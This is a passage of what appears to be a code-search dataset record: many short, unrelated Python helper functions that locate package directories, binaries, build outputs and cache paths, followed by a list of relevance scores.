GO\n\n return outpath", "def get_exec_path(self):\n bin_name = 'test_hint_time'\n # Look for in place build\n script_dir = os.path.dirname(os.path.realpath(__file__))\n bin_path = os.path.join(script_dir, '.libs', bin_name)\n if not os.path.exists(bin_path):\n # Look for out of place build from using apps/build_func.sh\n int_dir = os.path.dirname(script_dir)\n bin_path_op = os.path.join(int_dir, 'build/integration/test/.libs', bin_name)\n if not os.path.exists(bin_path_op):\n msg = 'Could not find application binary, tried \\n \"{}\"\\n \"{}\"'.format(\n bin_path, bin_path_op)\n raise RuntimeError(msg)\n bin_path = bin_path_op\n return bin_path", "def mapto_dir(self):\r\n return os.path.join(self._work_dir, 'mapped-jars')", "def __GetGenModuleDir(cls, src):\n return os.path.dirname(src.replace(FileUtils.GetSrcRoot(), cls.GetSwigOutDir()))", "def bin_root(self):\n return os.path.join(self.build_dir, self.build, \"stage0\")", "def get_debug_directory(self):\n \n try:\n data_dir = self.debug_dir()\n except ValueError, why:\n return obj.NoneObject(str(why))\n\n return obj.Object(\"_IMAGE_DEBUG_DIRECTORY\", \n offset = self.DllBase + data_dir.VirtualAddress, \n vm = self.obj_native_vm)", "def get_package_dir():\n return Path(__file__).parent", "def find_binaries():\n\n builddir = Path(__file__).parent.parent / \"builddir\"\n\n bins = []\n\n for folder in [\"examples\", \"tests\", \"tools\"]:\n for path in sorted((builddir / folder).rglob(\"*\")):\n if 
path.stem.startswith(\"xnvme_single\"):\n continue\n if path.stem.startswith(\"xnvme_dev\"):\n continue\n if path.stem.startswith(\"xnvme_enum\"):\n continue\n if path.is_file() and path.stat().st_mode & os.X_OK:\n bins.append(path.name)\n\n return bins", "def getBinary():\n binary = shutil.which(_ROCKETLOGGER_BINARY)\n\n if not os.path.exists(binary):\n raise FileNotFoundError(f\"Could not find RocketLogger CLI binary! [{binary}]\")\n return os.path.abspath(binary)", "def thisdir():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n # Change this bit to match where you store your data files:\n return os.path.dirname(__file__)", "def get_bitstream_path():\n\n env = get_env()\n\n # Derive destination path\n cache_dir = os.getenv(\"VTA_CACHE_PATH\", os.path.join(os.getenv(\"HOME\"), \".vta_cache/\"))\n cache_dir = os.path.join(cache_dir, env.TARGET)\n cache_dir = os.path.join(cache_dir, env.HW_VER.replace(\".\", \"_\"))\n # Create the directory if it didn't exist\n if not os.path.exists(cache_dir):\n os.makedirs(cache_dir)\n bit_path = os.path.join(cache_dir, env.BITSTREAM) + \".bit\"\n\n return bit_path", "def get_binary_name():\n return os.path.basename(inspect.stack()[-1][1])[:16]", "def get_pack_path():\r\n return get_package_path().replace(\"\\\\\", \"/\").replace(\"src\", \"\")", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph4/src\"", "def get_temp_dir(self):\n base = tempfile.gettempdir()\n ring_mo = RING_MATCHER.match(self.filename)\n if not ring_mo:\n return base\n\n universe = ring_mo.group(3) + '.Universe'\n ring = ring_mo.group(4) + '.Ring'\n if 'SoloFocus' in self.filename:\n ring += '.Local'\n\n temp_dir = self.meditech_pgmsource_cache(universe, ring)\n if not os.path.exists(temp_dir):\n if os.path.exists(os.path.dirname(temp_dir)):\n try:\n create_dir(temp_dir)\n except OSError:\n return base\n else:\n return base\n\n codebase = os.path.basename(os.path.dirname(self.filename))\n temp_dir = os.path.join(temp_dir, codebase)\n\n try:\n create_dir(temp_dir)\n except OSError:\n return base\n else:\n return temp_dir", "def module_path():\r\n if hasattr(sys, \"frozen\"):\r\n return os.path.dirname(sys.executable)\r\n return os.path.dirname(__file__)", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph5/src\"", "def shared_binary_location(cmd=\"shared\"):\n return os.path.join(BIN_PREFIX, cmd)\n return binary_location(cmd, SHARED_USE_PATH)", "def _get_package_dir(self, package, component):\n return join('pool', component, Repository.get_pool(package), package)", "def getSteamAppDir(appid: int) -> str:\n\tfor path in libraryFolders():\n\t\ttry:\n\t\t\tlogger.info(f'searching for {appid} in {path}..')\n\t\t\twith open(f'{path}appmanifest_{appid}.acf', 'r') as file:\n\t\t\t\t# found the app!\n\t\t\t\t# get the app's name\n\t\t\t\tinstDir = Property.parse( file, f'appmanifest_{appid}.acf' ).as_dict()[ 'appstate' ][ 'installdir' ]\n\t\t\t\tpath += f'common/{instDir}/'\n\t\t\t\tlogger.info(f'{appid} found! 
path: {path}')\n\t\t\t\treturn path\n\t\texcept FileNotFoundError:\n\t\t\t# if no, just continue\n\t\t\tcontinue\n\traise RuntimeError(f'No path found for app {appid}!')", "def output_dir(self):\n return self.c.build_dir.join(self.c.build_config_fs)", "def tmpDir(package):\n\treturn 'debian/'+package", "def get_cur_directory(file_name: str=__file__) -> str:\n if hasattr(sys, 'frozen') and sys.frozen:\n path, filename = os.path.split(sys.executable)\n directory = path\n else:\n directory = os.path.dirname(os.path.realpath(file_name))\n return directory", "def get_reference_binary():\n return \"./Binary/linux-x64/astcenc\"", "def path_to_program_dir(self):\n\tpath = sys.argv[0]\n\n\tif not os.path.isdir(path):\n\t path = os.path.dirname(path)\n\n\tif not path: return '.'\n\n\treturn path", "def find_path():\n __dir_path__ = os.path.dirname(os.path.realpath(__file__))\n return __dir_path__", "def module_path():\n try:\n this_file_path = __file__\n except NameError:\n # inside an interpreter, we can use the stack to find the file\n # path.\n tbs = traceback.extract_stack()\n this_file_path = tbs[0][0]\n # move back up to rfm directory\n dev_root = os.path.dirname(this_file_path)\n\n return dev_root", "def symbol_to_path(symbol, base_dir=None):\n if base_dir is None:\n base_dir = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def _search_path_to_file(self, directory, binary_name):\n for root, dirs, files in os.walk(directory):\n if binary_name in files:\n return os.path.join(root, binary_name)\n raise micp_kernel.NoExecutableError", "def _GetDefaultBinPathExcludes(self):\n if sys.platform == \"win32\":\n import cx_Freeze.util\n systemDir = cx_Freeze.util.GetSystemDir()\n windowsDir = cx_Freeze.util.GetWindowsDir()\n return [windowsDir, systemDir, os.path.join(windowsDir, \"WinSxS\")]\n elif sys.platform == \"darwin\":\n return [\"/lib\", \"/usr/lib\", \"/System/Library/Frameworks\"]\n else:\n return [\"/lib\", \"/lib32\", \"/lib64\", \"/usr/lib\", \"/usr/lib32\",\n \"/usr/lib64\"]", "def get_directory(self):\n mypath = mlblocks.get_primitives_paths()[-1]\n return mypath", "def test_llvm_bin_dir(self):\n self.assertEqual(\n self.ndk.llvm_bin_dir,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin\",\n )", "def get_build_dir(package_dir):\n return os.path.split(makepkg([\"--packagelist\"], True, package_dir)[0])[0]", "def binary_location(cmd, USE_PATH=False):\n if USE_PATH:\n return cmd\n else:\n return os.path.join(BIN_PREFIX, cmd)", "def getMHCIPDBFpBin(self):\n fn = \"mhcI_pdbs.bin\"\n return self.joinPath(self.mhcIdb_pdb_path, fn)", "def get_test_binary():\n return \"./Source/astcenc\"", "def getCoreDir(thisDir):\n coreFolder = str(CoreDirectory())\n # print(('coreDirectory: %s'% coreFolder))\n #the stuff testing for existance of natlinkmain.py etc has been removed, no\n #longer required.\n return coreFolder", "def getmp_mpdir():\n return os.path.join(getmp_rootdir(), 'lib', 'python', 'mod_python')", "def debug_dir(self):\n return self._directory(6) # IMAGE_DEBUG_DIRECTORY", "def get_installdir(self):\n import mewlo\n path = os.path.dirname(os.path.realpath(mewlo.__file__))\n return path", "def pdb_path(scope=\"session\"):\n return join(dirname(__file__), pardir, \"new_data\", \"pdb\")", "def get_target_binary():\n file_location = prompt_base(\"where is the file located?\")\n file_location = os.path.abspath(file_location)\n return file_location", "def get_axebindir():\n import sys\n\n if 'axesrc' in 
sys.modules:\n modfile = sys.modules['axesrc'].__file__\n axebindir = os.path.abspath(os.path.join(os.path.dirname(modfile),'../bin/'))\n\n else:\n from pyraf import iraf\n\n # just read all variables\n all_variables = iraf.getVarDict()\n\n arch = all_variables['arch']\n stsdas = all_variables['stsdas']\n # compose the bin directory\n axebindir = os.path.join(stsdas, 'bin'+arch)\n #axe = all_variables['axe']\n #axebindir = all_variables['axebin']\n\n # compose the bin directory\n #axebindir = os.path.join(axe, 'bin')\n\n # return the path\n return axebindir", "def get_main_dir():\n return os.path.dirname(os.getcwd())", "def symbol_to_path(symbol, base_dir=\"files/input\"):\n print('base_dir=', base_dir)\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def symbol_to_path(symbol, base_dir=\"files/input\"):\n print ('base_dir=',base_dir)\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def binaries_path(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def package_dir(self):\r\n return \".\"", "def find_resource_dir(self, dock_image: str, meta: dict) -> str:\n try:\n return self.interrogate_python_package_location(dock_image, meta)\n except CalledProcessError:\n return ''", "def __get_module_root_dir(self):\n # type: () -> str\n if self.location in ['.', '.' + os.sep]:\n return self.env_root\n if self.source != 'local':\n return self.__fetch_remote_source()\n return os.path.join(self.env_root, self.location)", "def find_brew_binary_location(package_folder, search_string):\n match_str = '/usr/local/Cellar/%s/**/*%s*' % (package_folder,\n search_string)\n paths = glob.glob(match_str, recursive=True)\n for path in paths:\n if os.access(path, os.X_OK):\n return path\n return None", "def datadir(cls): # pylint: disable=E0213\n mod = sys.modules[cls.__module__]\n return osp.join(osp.dirname(osp.abspath(mod.__file__)), 'data')", "def module_path():\n from sys import path\n from os import getcwd\n from os.path import basename,exists\n from inspect import getmodulename,getfile\n from logging import warn\n # 'getfile' retreives the source file name name compiled into the .pyc file.\n pathname = getfile(lambda x: None)\n if exists(pathname): return pathname\n # The module might have been compiled on a different machine or in a\n # different directory.\n pathname = pathname.replace(\"\\\\\",\"/\")\n filename = basename(pathname)\n dirs = [dir for dir in [getcwd()]+path if exists(dir+\"/\"+filename)]\n if len(dirs) == 0: warn(\"pathname of file %r not found\" % filename)\n dir = dirs[0] if len(dirs) > 0 else \".\"\n pathname = dir+\"/\"+filename\n return pathname", "def symbol_to_path(symbol, base_dir= proj_path + '/data/'): \n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def _states_path():\n return os.path.join(__opts__[\"cachedir\"], \"freezer\")", "def get_app_root():\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n return sys._MEIPASS\n except AttributeError:\n if 'pytest' in sys.modules:\n for arg in reversed(sys.argv):\n path = os.path.realpath(arg.split('::')[0])\n if os.path.exists(path):\n return path if os.path.isdir(path) else os.path.dirname(path)\n else:\n return os.path.dirname(os.path.realpath(sys.argv[0]))", "def _build_binary_file_path(program_path: pathlib.Path, build_dir: pathlib.Path, hex_file: bool) -> pathlib.Path:\n fw_fbase = build_dir / program_path.name\n fw_file = fw_fbase.with_suffix(\".hex\" if hex_file else \".bin\")\n if not fw_file.exists():\n raise 
BinaryFileNotFoundError(f\"Build program file (firmware) not found {fw_file}\")\n return fw_file", "def getmp_rootdir():\n return os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))", "def get_hopper_script_dir():\n\n dirs = [os.path.expanduser(\"~/.local/share/data/Hopper/scripts\"),\n os.path.expandvars(\"%LOCALAPPDATA%/Hopper/scripts\"),\n os.path.expanduser(\"~/Library/Application Support/Hopper/Scripts/HopperScripts\")]\n for directory in dirs:\n if os.path.exists(directory):\n return directory\n return None", "def flag_dir(self):\n return self.system_path(self._flag_dir)", "def path(self):\n if not self._path:\n logger.spam(\"Checking for helper executable %s\", self.name)\n self._path = distutils.spawn.find_executable(self.name)\n if self._path:\n logger.debug(\"%s is at %s\", self.name, self.path)\n self._installed = True\n else:\n logger.debug(\"No path to %s found\", self.name)\n return self._path", "def _get_mingw_dll_dir():\n gfortran_exe = shutil.which(\"gfortran\")\n if gfortran_exe is None:\n return None\n\n gfortran_exe = pathlib.Path(gfortran_exe)\n bin_dir = gfortran_exe.resolve().parent\n matches = list(bin_dir.glob(\"libgfortran*.dll\"))\n if len(matches) == 0:\n return None\n\n return str(bin_dir)", "def exepath(filename):\r\n return os.path.abspath(os.path.join(os.path.dirname(sys._getframe(1).f_code.co_filename), filename))", "def getRootPath():\n return '/'.join(__file__.split('/')[:-4]) # Path of this file with pagebot/__init__.py(c) removed.", "def bin_path(self) -> Path:\n return self._root_path / \"stefan-on-software-api-client\" / \"bin\"", "def program_dir():\n if (Win32() and (hasattr(sys, 'frozen') or imp.is_frozen('__main__'))):\n # running from exe generated by py2exe\n return os.path.dirname(sys.executable)\n else:\n return sys.path[0]\n # return os.path.dirname(os.path.abspath(sys.argv[0]))", "def get_exe_path(exe):\n for type_, path in get_possible_paths():\n full_path = os.path.join(path, exe)\n if os.path.exists(full_path):\n if type_ == 'bundled':\n bundled_warning()\n return full_path\n return None", "def acquire_package_directory():\n top_plugin_dir = os.path.realpath(os.path.join(os.getcwd(),\n os.path.dirname(__file__)))\n expected_package_dir = '/extras/MockApp'\n app_dir = top_plugin_dir + expected_package_dir\n return app_dir", "def bootstrap_binary(self):\n return os.path.join(self.build_dir, \"bootstrap\", \"debug\", \"bootstrap\")", "def get_kernel_path():\n path = \"/\".join(os.path.dirname(os.path.realpath(__file__)).split('/')[:-1])\n return path+'/src/'", "def get_root():\n\n return 'data/simulators/mg1'", "def get_scratch_dir():\n scratch_dir = os.path.join(get_repo_dir(), \"target\", \"compat-check\")\n if not os.path.exists(scratch_dir):\n os.makedirs(scratch_dir)\n return scratch_dir", "def getmp_srcdir():\n return os.path.join(getmp_rootdir(), 'src')", "def get_packaging_pictures_path(self):\n file_path = os.path.dirname(__file__)\n file_path = os.path.join(file_path, \"Packaging\")\n return file_path", "def get_executable_path(py_binary_name):\n\n if os.name == 'nt':\n py_binary_name += '.exe'\n manifest_file = os.path.join(FLAGS.test_srcdir, 'MANIFEST')\n workspace_name = os.environ['TEST_WORKSPACE']\n manifest_entry = '{}/{}'.format(workspace_name, py_binary_name)\n with open(manifest_file, 'r') as manifest_fd:\n for line in manifest_fd:\n tokens = line.strip().split(' ')\n if len(tokens) != 2:\n continue\n if manifest_entry == tokens[0]:\n return tokens[1]\n raise RuntimeError(\n 'Cannot locate executable path for 
{}, MANIFEST file: {}.'.format(\n py_binary_name, manifest_file))\n else:\n # NOTE: __file__ may be .py or .pyc, depending on how the module was\n # loaded and executed.\n path = __file__\n\n # Use the package name to find the root directory: every dot is\n # a directory, plus one for ourselves.\n for _ in range(__name__.count('.') + 1):\n path = os.path.dirname(path)\n\n root_directory = path\n return os.path.join(root_directory, py_binary_name)", "def _blink_base(self):\n module_path = self._filesystem.path_to_module(self.__module__)\n tools_index = module_path.rfind('tools')\n assert tools_index != -1, 'could not find location of this checkout from %s' % module_path\n return self._filesystem.normpath(module_path[0:tools_index - 1])", "def this_folder():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n return os.path.dirname(__file__)", "def path(self):\n path = os.path.join(self.base_dir, self.store().replace(' ', '_'), self.package_name())\n return os.path.abspath(path)", "def FindBinary(module_space, bin_name):\n if not bin_name:\n return None\n if bin_name.startswith(\"//\"):\n # Case 1: Path is a label. Not supported yet.\n raise AssertionError(\n \"Bazel does not support execution of Python interpreters via labels yet\"\n )\n elif os.path.isabs(bin_name):\n # Case 2: Absolute path.\n return bin_name\n # Use normpath() to convert slashes to os.sep on Windows.\n elif os.sep in os.path.normpath(bin_name):\n # Case 3: Path is relative to the repo root.\n return os.path.join(module_space, bin_name)\n else:\n # Case 4: Path has to be looked up in the search path.\n return SearchPath(bin_name)", "def symbol_to_path(symbol, base_dir=\"data\"):\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def symbol_to_path(symbol, base_dir=\"data\"):\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def BrocDir(self):\n return os.path.dirname(os.path.join(self._module.workspace, self._module.broc_cvspath))", "def outputdir():\n return __OUTPUT_DIR__", "def location(self):\n\n p = os.path.abspath(__file__)\n pathSP = os.path.split(p)\n return pathSP" ]
[ "0.6687989", "0.668011", "0.6666962", "0.6321019", "0.63035196", "0.6107489", "0.6062449", "0.6049191", "0.6031628", "0.6012374", "0.5988652", "0.5959031", "0.5932072", "0.5915141", "0.59118515", "0.59096825", "0.5886469", "0.5836009", "0.58122456", "0.58107346", "0.58003944", "0.57813776", "0.57147396", "0.5705924", "0.5696492", "0.5696148", "0.569374", "0.5686065", "0.5680613", "0.56766015", "0.56746584", "0.5664329", "0.5664138", "0.56620914", "0.5661892", "0.5657953", "0.5652321", "0.5651023", "0.56498504", "0.5644514", "0.5640601", "0.56326944", "0.5625382", "0.56225914", "0.56204456", "0.5617417", "0.5616858", "0.56001985", "0.5598852", "0.55886245", "0.55847615", "0.5573665", "0.556784", "0.5557073", "0.55442065", "0.5540504", "0.5535553", "0.5533281", "0.55318785", "0.55204254", "0.55154485", "0.55065715", "0.5502768", "0.55020034", "0.5495792", "0.5493137", "0.5486147", "0.54791856", "0.54747534", "0.5455119", "0.5452504", "0.5450197", "0.5443747", "0.54425234", "0.5437902", "0.54371506", "0.5437046", "0.5436472", "0.541752", "0.54126054", "0.54085606", "0.54071206", "0.5405715", "0.5403471", "0.54034567", "0.54009455", "0.5400812", "0.5399069", "0.53893083", "0.53857523", "0.5385652", "0.53828716", "0.5378779", "0.5373533", "0.5373151", "0.5361074", "0.5361074", "0.5360126", "0.53598905", "0.5358987" ]
0.7879615
0
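The document in the record above locates a symbol directory by running `file` on candidate binaries and matching the output against a per-architecture regex. A minimal sketch of that core check follows; the regex table here is an illustrative assumption, not the `_BREAKPAD_ARCH_TO_FILE_REGEX` mapping from the original code:

```python
# Minimal sketch of the architecture check used in the record above: run
# `file` on a candidate binary and match its output against a per-arch
# regex. The mapping below is an assumption for illustration only.
import re
import subprocess

ARCH_TO_FILE_REGEX = {
    'arm': re.compile(r'.*32-bit.*ARM.*'),
    'arm64': re.compile(r'.*64-bit.*ARM aarch64.*'),
    'x86_64': re.compile(r'.*64-bit.*x86-64.*'),
}


def binary_matches_arch(binary_path: str, arch: str) -> bool:
    """Return True if `file` reports the binary as the given architecture."""
    matcher = ARCH_TO_FILE_REGEX.get(arch)
    if matcher is None:
        return False
    stdout = subprocess.check_output(
        ['file', binary_path], stderr=subprocess.STDOUT).decode('utf-8')
    return matcher.match(stdout) is not None
```

As in the original, checking the `file` output rather than trusting directory names lets the search tolerate build layouts where binaries for several architectures live side by side.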
Runs minidump_dump on the given minidump. Caches the result for reuse.
def _GetMinidumpDumpOutput(self, minidump): if minidump in self._minidump_dump_output: logging.debug('Returning cached minidump_dump output for %s', minidump) return self._minidump_dump_output[minidump] dumper_path = local_first_binary_manager.GetInstance().FetchPath( 'minidump_dump') if not os.access(dumper_path, os.X_OK): logging.warning('Cannot run minidump_dump because %s is not found.', dumper_path) return None # Using subprocess.check_output with stdout/stderr mixed can result in # errors due to log messages showing up in the minidump_dump output. So, # use Popen and combine into a single string afterwards. p = subprocess.Popen( [dumper_path, minidump], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = p.communicate() stdout = stdout + '\n' + stderr if p.returncode != 0: # Dumper errors often do not affect stack walkability, just a warning. # It's possible for the same stack to be symbolized multiple times, so # add a timestamp suffix to prevent artifact collisions. now = datetime.datetime.now() suffix = now.strftime('%Y-%m-%d-%H-%M-%S') artifact_name = 'dumper_errors/%s-%s' % ( os.path.basename(minidump), suffix) logging.warning( 'Reading minidump failed, but likely not actually an issue. Saving ' 'output to artifact %s', artifact_name) artifact_logger.CreateArtifact(artifact_name, stdout) if stdout: self._minidump_dump_output[minidump] = stdout return stdout
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def testPullMinidumps(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n time_offset = platform_backend.GetDeviceHostClockOffset()\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n # Android's implementation of \"touch\" doesn't support setting time via\n # Unix timestamps, only via dates, which are affected by timezones. So,\n # figure out what the device's timestamp for January 2nd, 1970 is and use\n # that to calculate the expected local timestamp. January 2nd is used\n # instead of January 1st so that we can't get accidentally get a negative\n # timestamp if the host-device clock offset is negative.\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', '-d', '1970-01-02T00:00:00', remote_dump_file])\n device_mtime = self._browser_backend.device.RunShellCommand(\n ['stat', '-c', '%Y', remote_dump_file], single_line=True)\n device_mtime = int(device_mtime.strip())\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n self.assertEqual(os.path.getmtime(local_path), device_mtime - time_offset)", "def dumbcache_dump(self, cache_dir=r'data\\cache'):\n obj = self\n\n DUMBCACHE = os.path.join(r'..', cache_dir, r'br_store.dmp')\n with open(DUMBCACHE, 'wb') as f:\n pkl.dump(obj, f)", "def testPullMinidumpsLockedFilesIgnored(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n remote_locked_dump_file = posixpath.join(remote_path, 'locked_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_dump_file])\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_locked_dump_file])\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_locked_dump_file + '.lock'])\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'locked_dump')\n self.assertFalse(os.path.exists(local_path))", "def disasm_dump(bin, addr):\n return cache.access((bin,addr), lambda x: disasm_work(*x))", "def testPullMinidumpsOnlyNew(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n local_old_dump_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'old_dump')\n with open(local_old_dump_path, 'w'):\n pass\n old_dump_time = os.stat(local_old_dump_path).st_mtime\n\n platform_backend = self._browser_backend.platform_backend\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n remote_dump_file = 
posixpath.join(remote_path, 'new_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', '-d', '1970-01-02T00:00:00', remote_dump_file])\n remote_dump_file = posixpath.join(remote_path, 'old_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', '-d', '1970-01-02T00:00:00', remote_dump_file])\n\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_new_dump_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'new_dump')\n self.assertTrue(os.path.exists(local_new_dump_path))\n self.assertTrue(os.path.exists(local_old_dump_path))\n # A changed mtime would mean that the dump was re-pulled\n self.assertEqual(os.stat(local_old_dump_path).st_mtime, old_dump_time)", "def test_dump_calls_pg_dump(mocker):\n\tmocker.patch('subprocess.Popen')\n\tassert pgdump.dump(url)\n\tsubprocess.Popen.assert_called_with(['pg_dump', url], stdout=subprocess.PIPE)", "def PullDumps(self, host_dir):\n # The device/emulator's clock might be off from the host, so calculate an\n # offset that can be added to the host time to get the corresponding device\n # time.\n # The offset is (device_time - host_time), so a positive value means that\n # the device clock is ahead.\n time_offset = self.GetDeviceHostClockOffset()\n\n stdout, _ = self.RunCmdOnDevice([\n 'ls', '-1',\n cmd_helper.SingleQuote(self.ExpandUser(self.MINIDUMP_DIR))\n ])\n device_dumps = stdout.splitlines()\n for dump_filename in device_dumps:\n host_path = os.path.join(host_dir, dump_filename)\n # Skip any ignored files since they're not useful and could be deleted by\n # the time we try to pull them.\n if _IsIgnoredFileType(dump_filename):\n continue\n if os.path.exists(host_path):\n continue\n device_path = cmd_helper.SingleQuote(\n posixpath.join(self.MINIDUMP_DIR, dump_filename))\n\n # Skip any directories that happen to be in the list.\n if self.IsDir(device_path):\n continue\n\n # Skip any files that have a corresponding .lock file, as that implies the\n # file hasn't been fully written to disk yet.\n device_lock_path = cmd_helper.SingleQuote(\n posixpath.join(self.MINIDUMP_DIR, dump_filename + '.lock'))\n if self.FileExistsOnDevice(device_lock_path):\n logging.debug('Not pulling file %s because a .lock file exists for it',\n device_path)\n continue\n try:\n self.GetFile(device_path, host_path)\n except Exception as e: # pylint: disable=broad-except\n logging.error('Failed to get file %s: %s', device_path, e)\n continue\n # Set the local version's modification time to the device's.\n stdout, _ = self.RunCmdOnDevice(\n ['ls', '--time-style', '+%s', '-l', device_path])\n stdout = stdout.strip()\n # We expect whitespace-separated fields in this order:\n # mode, links, owner, group, size, mtime, filename.\n # Offset by the difference of the device and host clocks.\n device_mtime = int(stdout.split()[5])\n host_mtime = device_mtime - time_offset\n os.utime(host_path, (host_mtime, host_mtime))", "def clean_dump(self, dump_filename):\n # Read dump file generated by mysqldump\n with open(dump_filename, \"r\") as dump_file:\n dump_text = regroup_inserts(dump_file.read())\n\n with open(dump_filename, \"w\") as dump_file:\n # add the use database statement at the beginning\n dump_file.write(\"USE {};\\n\".format(self.database_name))\n\n # overwrite the dump with the new single statement version\n dump_file.write(dump_text)", "def run_dump(self, expanded, unexpanded) : \n\t\tif len(expanded) < 2 :\n\t\t\treturn self.errormessage(\"Needs at 
least a destination directory and one object id to dump\")\n\t\tdestination = os.path.normpath(os.path.expanduser(expanded[0])) # in case there's a ~username\n\t\tif not os.path.isdir(destination) :\n\t\t\treturn self.errormessage(\"%s is not a directory\" % destination)\n\t\tstatus = 0\n\t\tfor arg in expanded[1:] :\n\t\t\tobject = self.toObject(self.__context, arg)\n\t\t\tif object is None :\n\t\t\t\tstatus = status + self.errormessage(\"Object %s doesn't exist\" % arg)\n\t\t\telif not self.HasPerms(object, 'View management screens') :\n\t\t\t\tstatus = status - 1\n\t\t\telif not hasattr(object, \"document_src\") or not callable(object.document_src) :\n\t\t\t\tstatus = status + self.errormessage(\"Doesn't know how to dump object %s\" % arg)\n\t\t\telse :\n\t\t\t\tfname = os.path.join(destination, object.getId())\n\t\t\t\ttry :\n\t\t\t\t\tfout = open(fname, \"wb\")\n\t\t\t\t\tfout.write(object.document_src())\n\t\t\t\t\tfout.close()\n\t\t\t\t\tself.htmlmessage(\"Object %s dumped to server as %s\" % (self.ObjectPath(object), fname))\n\t\t\t\texcept IOError, msg :\n\t\t\t\t\tstatus = status + self.errormessage('Error %s, occured while dumping %s' % (msg, arg))\n\t\treturn status", "def testPullMinidumpsLockFilesIgnored(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n remote_lock_file = posixpath.join(remote_path, 'test_file.lock')\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_dump_file])\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_lock_file])\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_file.lock')\n self.assertFalse(os.path.exists(local_path))", "def do_disassemble(self, args):\n if len(args) != 0:\n args = args.split(' ')\n self.u_start = self.ParseAddressExpr(args[0])\n self.u_size = self.ParseAddressExpr(args[1]) if len(args) > 1 else 0x20\n skip = False\n else:\n # Skip the first instruction if we reuse the last address.\n skip = True\n\n if not self.reader.IsValidAddress(self.u_start):\n print(\"Address %s is not contained within the minidump!\" % (\n self.reader.FormatIntPtr(self.u_start)))\n return\n lines = self.reader.GetDisasmLines(self.u_start, self.u_size)\n if len(lines) == 0:\n print(\"Address %s could not be disassembled!\" % (\n self.reader.FormatIntPtr(self.u_start)))\n print(\" Could not disassemble using %s.\" % OBJDUMP_BIN)\n print(\" Pass path to architecture specific objdump via --objdump?\")\n return\n for line in lines:\n if skip:\n skip = False\n continue\n print(FormatDisasmLine(self.u_start, self.heap, line))\n # Set the next start address = last line\n self.u_start += lines[-1][0]\n print()", "def split_debug(src, objcopy=None, objdump=None):\n if objcopy is None:\n objcopy = \"objcopy\"\n if objdump is None:\n objdump = \"objdump\"\n if not contains_debug_info(src, objdump=objdump):\n ui.info(\"-- Already stripped\", src)\n return\n src_stat = os.stat(src)\n dirname, basename = 
